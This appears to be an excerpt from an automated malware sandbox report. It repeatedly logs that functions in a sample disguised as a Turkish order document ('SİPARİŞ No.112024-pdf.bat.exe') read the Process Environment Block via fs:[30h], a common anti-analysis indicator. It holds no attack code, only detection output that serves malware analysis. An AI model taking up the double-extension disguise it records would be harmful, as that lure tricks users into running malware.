Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D551EF mov eax, dword ptr fs:[00000030h] 4_2_32D551EF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D351ED mov eax, dword ptr fs:[00000030h] 4_2_32D351ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h] 4_2_32DB019F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h] 4_2_32DB019F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h] 4_2_32DB019F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB019F mov eax, dword ptr fs:[00000030h] 4_2_32DB019F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h] 4_2_32D2A197
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h] 4_2_32D2A197
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2A197 mov eax, dword ptr fs:[00000030h] 4_2_32D2A197
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D70185 mov eax, dword ptr fs:[00000030h] 4_2_32D70185
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEC188 mov eax, dword ptr fs:[00000030h] 4_2_32DEC188
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEC188 mov eax, dword ptr fs:[00000030h] 4_2_32DEC188
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4B1B0 mov eax, dword ptr fs:[00000030h] 4_2_32D4B1B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h] 4_2_32DE11A4
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h] 4_2_32DE11A4
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h] 4_2_32DE11A4
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE11A4 mov eax, dword ptr fs:[00000030h] 4_2_32DE11A4
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D37152 mov eax, dword ptr fs:[00000030h] 4_2_32D37152
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2C156 mov eax, dword ptr fs:[00000030h] 4_2_32D2C156
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D36154 mov eax, dword ptr fs:[00000030h] 4_2_32D36154
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D36154 mov eax, dword ptr fs:[00000030h] 4_2_32D36154
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h] 4_2_32DC4144
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h] 4_2_32DC4144
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC4144 mov ecx, dword ptr fs:[00000030h] 4_2_32DC4144
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h] 4_2_32DC4144
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC4144 mov eax, dword ptr fs:[00000030h] 4_2_32DC4144
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h] 4_2_32D29148
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h] 4_2_32D29148
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h] 4_2_32D29148
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29148 mov eax, dword ptr fs:[00000030h] 4_2_32D29148
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 mov eax, dword ptr fs:[00000030h] 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC9179 mov eax, dword ptr fs:[00000030h] 4_2_32DC9179
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05152 mov eax, dword ptr fs:[00000030h] 4_2_32E05152
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DDA118 mov ecx, dword ptr fs:[00000030h] 4_2_32DDA118
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h] 4_2_32DDA118
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h] 4_2_32DDA118
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DDA118 mov eax, dword ptr fs:[00000030h] 4_2_32DDA118
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF0115 mov eax, dword ptr fs:[00000030h] 4_2_32DF0115
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D31131 mov eax, dword ptr fs:[00000030h] 4_2_32D31131
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D31131 mov eax, dword ptr fs:[00000030h] 4_2_32D31131
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h] 4_2_32D2B136
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h] 4_2_32D2B136
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h] 4_2_32D2B136
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B136 mov eax, dword ptr fs:[00000030h] 4_2_32D2B136
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D60124 mov eax, dword ptr fs:[00000030h] 4_2_32D60124
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A6C7 mov ebx, dword ptr fs:[00000030h] 4_2_32D6A6C7
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A6C7 mov eax, dword ptr fs:[00000030h] 4_2_32D6A6C7
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3B6C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3B6C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3B6C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3B6C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3B6C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3B6C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3B6C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h] 4_2_32DF16CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h] 4_2_32DF16CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h] 4_2_32DF16CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF16CC mov eax, dword ptr fs:[00000030h] 4_2_32DF16CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF6C7 mov eax, dword ptr fs:[00000030h] 4_2_32DEF6C7
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D616CF mov eax, dword ptr fs:[00000030h] 4_2_32D616CF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h] 4_2_32DAE6F2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h] 4_2_32DAE6F2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h] 4_2_32DAE6F2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DAE6F2 mov eax, dword ptr fs:[00000030h] 4_2_32DAE6F2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB06F1 mov eax, dword ptr fs:[00000030h] 4_2_32DB06F1
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB06F1 mov eax, dword ptr fs:[00000030h] 4_2_32DB06F1
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DED6F0 mov eax, dword ptr fs:[00000030h] 4_2_32DED6F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h] 4_2_32DC36EE
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h] 4_2_32DC36EE
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h] 4_2_32DC36EE
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h] 4_2_32DC36EE
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h] 4_2_32DC36EE
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC36EE mov eax, dword ptr fs:[00000030h] 4_2_32DC36EE
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5D6E0 mov eax, dword ptr fs:[00000030h] 4_2_32D5D6E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5D6E0 mov eax, dword ptr fs:[00000030h] 4_2_32D5D6E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D34690 mov eax, dword ptr fs:[00000030h] 4_2_32D34690
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D34690 mov eax, dword ptr fs:[00000030h] 4_2_32D34690
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h] 4_2_32DB368C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h] 4_2_32DB368C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h] 4_2_32DB368C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB368C mov eax, dword ptr fs:[00000030h] 4_2_32DB368C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h] 4_2_32D276B2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h] 4_2_32D276B2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D276B2 mov eax, dword ptr fs:[00000030h] 4_2_32D276B2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D666B0 mov eax, dword ptr fs:[00000030h] 4_2_32D666B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6C6A6 mov eax, dword ptr fs:[00000030h] 4_2_32D6C6A6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D6AA mov eax, dword ptr fs:[00000030h] 4_2_32D2D6AA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D6AA mov eax, dword ptr fs:[00000030h] 4_2_32D2D6AA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4C640 mov eax, dword ptr fs:[00000030h] 4_2_32D4C640
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D62674 mov eax, dword ptr fs:[00000030h] 4_2_32D62674
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF866E mov eax, dword ptr fs:[00000030h] 4_2_32DF866E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF866E mov eax, dword ptr fs:[00000030h] 4_2_32DF866E
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A660 mov eax, dword ptr fs:[00000030h] 4_2_32D6A660
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A660 mov eax, dword ptr fs:[00000030h] 4_2_32D6A660
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D69660 mov eax, dword ptr fs:[00000030h] 4_2_32D69660
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D69660 mov eax, dword ptr fs:[00000030h] 4_2_32D69660
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D33616 mov eax, dword ptr fs:[00000030h] 4_2_32D33616
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D33616 mov eax, dword ptr fs:[00000030h] 4_2_32D33616
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D72619 mov eax, dword ptr fs:[00000030h] 4_2_32D72619
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D61607 mov eax, dword ptr fs:[00000030h] 4_2_32D61607
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DAE609 mov eax, dword ptr fs:[00000030h] 4_2_32DAE609
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6F603 mov eax, dword ptr fs:[00000030h] 4_2_32D6F603
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05636 mov eax, dword ptr fs:[00000030h] 4_2_32E05636
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h] 4_2_32D4260B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h] 4_2_32D4260B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h] 4_2_32D4260B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h] 4_2_32D4260B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h] 4_2_32D4260B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h] 4_2_32D4260B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4260B mov eax, dword ptr fs:[00000030h] 4_2_32D4260B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E627 mov eax, dword ptr fs:[00000030h] 4_2_32D4E627
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F626 mov eax, dword ptr fs:[00000030h] 4_2_32D2F626
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D66620 mov eax, dword ptr fs:[00000030h] 4_2_32D66620
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D68620 mov eax, dword ptr fs:[00000030h] 4_2_32D68620
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3262C mov eax, dword ptr fs:[00000030h] 4_2_32D3262C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3C7C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3C7C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h] 4_2_32D357C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h] 4_2_32D357C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D357C0 mov eax, dword ptr fs:[00000030h] 4_2_32D357C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D347FB mov eax, dword ptr fs:[00000030h] 4_2_32D347FB
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D347FB mov eax, dword ptr fs:[00000030h] 4_2_32D347FB
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3D7E0 mov ecx, dword ptr fs:[00000030h] 4_2_32D3D7E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h] 4_2_32D527ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h] 4_2_32D527ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D527ED mov eax, dword ptr fs:[00000030h] 4_2_32D527ED
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF78A mov eax, dword ptr fs:[00000030h] 4_2_32DEF78A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E037B6 mov eax, dword ptr fs:[00000030h] 4_2_32E037B6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5D7B0 mov eax, dword ptr fs:[00000030h] 4_2_32D5D7B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F7BA mov eax, dword ptr fs:[00000030h] 4_2_32D2F7BA
